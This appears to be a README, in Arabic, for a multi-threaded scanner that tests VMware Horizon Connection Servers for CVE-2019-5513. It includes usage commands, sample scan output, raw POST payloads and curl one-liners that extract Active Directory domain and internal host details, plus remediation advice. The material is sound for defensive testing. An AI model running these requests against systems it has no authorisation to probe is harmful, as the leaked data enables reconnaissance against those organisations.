
غالبًا ما يُستخدم خادم اتصال VMWare Horizon كبوابة مواجهة للإنترنت إلى بيئة سطح المكتب الافتراضي (VDI) الخاصة بالمؤسسة. حتى وقت قريب، كانت معظم هذه التثبيتات تكشف الاسم الداخلي لخادم الاتصال، وعنوان IP الداخلي للبوابة، ومجال Active Directory للمهاجمين غير المصادق عليهم.
أداة فحص عالية الأداء متعددة الخيوط لاكتشاف ثغرات كشف المعلومات غير المُصرَّح بها في نقطة النهاية /broker/xml الخاصة بخادم اتصال VMware Horizon.
يعرض خادم اتصال VMware Horizon نقطة نهاية XML API (/broker/xml) يمكنها تسريب معلومات إعدادات داخلية حساسة دون الحاجة إلى مصادقة. يحدد هذا الماسح بسرعة الخوادم المعرضة للخطر من خلال اختبار متجهي هجوم:
get-configuration.<?xml version="1.0" encoding="utf-8"?>
<broker>
<configuration>
<broker-service-principal>
<type>kerberos</type>
<name>[email protected]</name>
</broker-service-principal>
<domain>corporate-domain.example.com</domain>
</configuration>
</broker>
⚡ الميزات
- سرعة فائقة — بنية متعددة الخيوط (50 خيطًا متزامنًا افتراضيًا)
- اختبار البروتوكولين — يفحص HTTPS (المنفذ 443) وHTTP (المنفذ 80) في الوقت نفسه
- متجهان للهجوم — يختبر نص POST فارغ (zero-day) + XML مُصمم (CVE-2019-5513)
- مهلات زمنية منخفضة — 5 ثوانٍ كحد أقصى لكل طلب، و3 ثوانٍ لمهلة الاتصال
- مخرجات واضحة — نتائج ملوّنة مع استجابة XML الكاملة للخوادم المصابة
- تصدير النتائج — حفظ جميع النتائج في ملف باستخدام الخيار -o
- لا تبعيات — يستخدم curl فقط (أداة قياسية على معظم الأنظمة)
🚀 التثبيت
```bash
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner.git
cd vmware-horizon-scanner
# Make the script executable
chmod +x broker.sh
./broker.sh -d targets.txt
./broker.sh -d targets.txt -t 100
./broker.sh -d targets.txt -t 100 -o results.txt
| الخيار | الوصف |
|---|---|
-d <file> | ملف الإدخال الذي يحتوي على قائمة عناوين IP أو أسماء المضيفين (سطر لكل واحد) |
-t <num> | عدد الخيوط (الافتراضي: 50) |
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
VMware Horizon /broker/xml Vulnerability Scanner
Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)
[*] Scanning 3 hosts...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:
<?xml version="1.0" encoding="utf-8"?>
<broker>
<configuration>
<broker-service-principal>
<type>kerberos</type>
<name>TEST-SERVER$@DOMAIN</name>
</broker-service-principal>
</configuration>
</broker>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[-] 192.168.1.100 | NOT VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Total hosts: 3
Vulnerable: 2
Not vulnerable: 1
Time taken: 4 seconds
للاختبار اليدوي، هذه هي الطلبات الأولية:
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115
<?xml version='1.0' encoding='UTF-8'?><broker version='10.0'><get-configuration></get-configuration></broker>
curl -k -X POST "https://target/broker/xml" \
-H "Content-Type: text/xml" \
-H "User-Agent: VMware-Horizon-Client" \
-d ''
curl -k -X POST "https://target/broker/xml" \
-H "Content-Type: text/xml" \
-H "User-Agent: VMware-Horizon-Client" \
--data-binary '<?xml version="1.0" encoding="UTF-8"?><broker version="10.0"><get-configuration></get-configuration></broker>'
قم بترقية خادم اتصال VMware Horizon إلى إصدار مصحح:
| الإصدار | الإصدار المُصحح |
|---|---|
| 7.x | 7.8 أو أحدث |
| 7.5.x | 7.5.2 أو أحدث |
| 6.x | 6.2.8 أو أحدث |
تنفيذ ضوابط وصول الشبكة لتقييد الوصول إلى نقطة النهاية /broker/xml
استخدام قواعد WAF لحظر الطلبات غير المصادق عليها إلى هذه النقطة
مراقبة طلبات POST المشبوهة إلى /broker/xml
تستند هذه الأداة إلى أبحاث الباحثين الأمنيين التاليين:
الاكتشاف الأصلي لـ CVE-2019-5513 — Atredis Partners
Cory Mathews من Critical Start (اكتشاف مستقل)
اكتشاف Zero-Day في هذه الأداة
تم تحديد متجه الهجوم بنص POST الفارغ أثناء أبحاث إضافية. تتطلب الثغرة الأصلية حِمل XML مُصمم؛ تختبر هذه الأداة أيضًا طريقة النص الفارغ، التي لا تتطلب إنشاء أي حِمل وهي أبسط في التنفيذ.
هذه الأداة مخصصة للأغراض التعليمية ولاختبارات الأمان المصرح بها فقط. قد يؤدي فحص الأنظمة التي لا تملكها أو ليس لديك إذن صريح لاختبارها إلى انتهاك القوانين واللوائح. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.
رخصة MIT
إذا وجدت هذه الأداة مفيدة، يرجى منحها نجمة على GitHub!
| الخاصية | القيمة |
|---|
| CVE | CVE-2019-5513 |
| درجة CVSS | 5.3 (متوسطة) |
| المتجه | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| المنتجات المتأثرة | VMware Horizon Connection Server 7.x قبل 7.8، و7.5.x قبل 7.5.2، و6.x قبل 6.2.8 |
| المعلومات المسرّبة | اسم مجال Active Directory، واسم حساب الخدمة (حساب الجهاز)، وأسماء المضيفين الداخلية، وعناوين IP للبوابات |
-o <file> | ملف الإخراج لحفظ النتائج |
-h | عرض رسالة المساعدة |